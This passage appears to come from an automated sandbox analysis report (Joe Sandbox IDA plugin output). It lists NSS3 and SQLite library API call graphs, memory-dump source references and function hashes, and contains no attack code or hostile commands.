                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CF8919C,?), ref: 6CE67FBB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE67FCA
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6CF8915C,00000014), ref: 6CE67FFE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1489184013-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7c4d0bcc37f50b0b273a149b5acbe02dcd2376176e5bf241b6c4dec13b3e462f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 747b318c1b117323b1c314c39cff84a09c3ed3763707ac64707d9e7cb3feb8f0
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c4d0bcc37f50b0b273a149b5acbe02dcd2376176e5bf241b6c4dec13b3e462f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE11E771E542046AE7109A269D86FBB76F8DF4575CF20062DFC69D2B41F720E948C2A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,6CEEDC29,?), ref: 6CE6BE64
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6CEEDC29,?), ref: 6CE6BE78
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6CEEDC29,?), ref: 6CE6BE96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC116E
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6CEEDC29,?), ref: 6CE6BEBB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6CEEDC29,?), ref: 6CE6BEDF
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6CEEDC29,?), ref: 6CE6BEF3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3111646008-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d14cc1bd98e5b375d1feff652ef5ff36634aa68d88c1024746fb12ed93434f16
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D11B775F502095BEB008B659D51FAA77B8EF4125CF240028FD18EBB81EB31D909D7A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEF5B56
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF3D3F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BA90: PORT_NewArena_Util.NSS3(00000800,6CEF3CAF,?), ref: 6CE6BABF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CEF3CAF,?), ref: 6CE6BAD5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CEF3CAF,?), ref: 6CE6BB08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CEF3CAF,?), ref: 6CE6BB1A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CEF3CAF,?), ref: 6CE6BB3B
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF3CCB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF3CE2
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CEF3CF8
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF3D15
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF3D2E
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 402d4153db16239b12710c2ac6fdf869ef069e4cf383cb0e5376e702ca9b72b9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8911C8B5A116006FE7205E65EC41B9BB7F5AB1170CF708538E42A97B20E633F91AC663
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CEBFE08
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CEBFE1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC116E
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CEBFE29
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CEBFE3D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CEBFE62
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6CEBFE6F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 660648399-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f844f2f2335eb2256a681d108262f37fb1ed86dcdd0b6c02bf043a6f4f24ddea
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b13adcc8b71a58e037f5ba94f19047ee6a7f9a31249515776f1f4dad3567d78b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f844f2f2335eb2256a681d108262f37fb1ed86dcdd0b6c02bf043a6f4f24ddea
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED11E9BEA002016BEB018B54DD41A7B73B8AF552ADF348038F928A7B12E735D914C792
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6CF6FD9E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE51A48), ref: 6CF29BB3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE51A48), ref: 6CF29BC8
                                                                                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6CF6FDB9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4A900: TlsGetValue.KERNEL32(00000000,?,6CFC14E4,?,6CDE4DD9), ref: 6CE4A90F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CE4A94F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CF6FDD4
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6CF6FDF2
                                                                                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6CF6FE0D
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CF6FE23
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3365241057-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: cbdce6bb22f8d7facbd3e26b63f56408af325dfc76780591e2c67124c4c7a4db
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ca9436d8c917616e2132fd5ced47616480fa793d26cb33e9e2f4d71ec67e1883
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbdce6bb22f8d7facbd3e26b63f56408af325dfc76780591e2c67124c4c7a4db
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A0161B6F14201ABDF589F56FC009567A31BB132687158375E82647BE1E722EE38C781
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE4AFDA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CE4AFD3
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE4AFC4
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CE4AFCE
                                                                                                                                                                                                                                                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6CE4AF5C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                                                      • Opcode ID: eca9a41ea9e9e9dc2b23912dec5881a59b3a9b0ed9a40fde16b7610ec17029c3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a2170a7fa14285358ee5737c54e6863c26d9de8ce44d236ec1b9471824d8d65b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eca9a41ea9e9e9dc2b23912dec5881a59b3a9b0ed9a40fde16b7610ec17029c3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7091F275B402158FDB04CF59D850BAEB7F1BF45328F2984A8E865AB791D335ED02CB60
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CEAFC55
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CEAFCB2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CEAFDB7
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CEAFDDE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB8800: TlsGetValue.KERNEL32(?,6CEC085A,00000000,?,6CE68369,?), ref: 6CEB8821
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB8800: TlsGetValue.KERNEL32(?,?,6CEC085A,00000000,?,6CE68369,?), ref: 6CEB883D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB8800: EnterCriticalSection.KERNEL32(?,?,?,6CEC085A,00000000,?,6CE68369,?), ref: 6CEB8856
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CEB8887
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB8800: PR_Unlock.NSS3(?,?,?,?,6CEC085A,00000000,?,6CE68369,?), ref: 6CEB8899
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                                                                      • String ID: pkcs11:
                                                                                                                                                                                                                                                                                                                      • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e18a23fcfb2626fdb30c434b52e35084eb15edc03b0401667a84427cfadd54f2
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 79abadd4361408616f653df4f08138b655350256363d632e11c2b3b6c85bcdff
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e18a23fcfb2626fdb30c434b52e35084eb15edc03b0401667a84427cfadd54f2
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51C1B1B00112AFEB118BA59D40B6A7375EF4135DF350129D9046FB52EB39E907CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CDEBE02
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF19C40: memcmp.VCRUNTIME140(?,00000000,6CDEC52B), ref: 6CF19D53
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDEBE9F
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CDEBE98
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDEBE89
                                                                                                                                                                                                                                                                                                                      • database corruption, xrefs: 6CDEBE93
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 1135338897-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4af5f4d64cda4dc79cfa1e718f7967c0b155589e2409978cefb4b27ca9e784fb
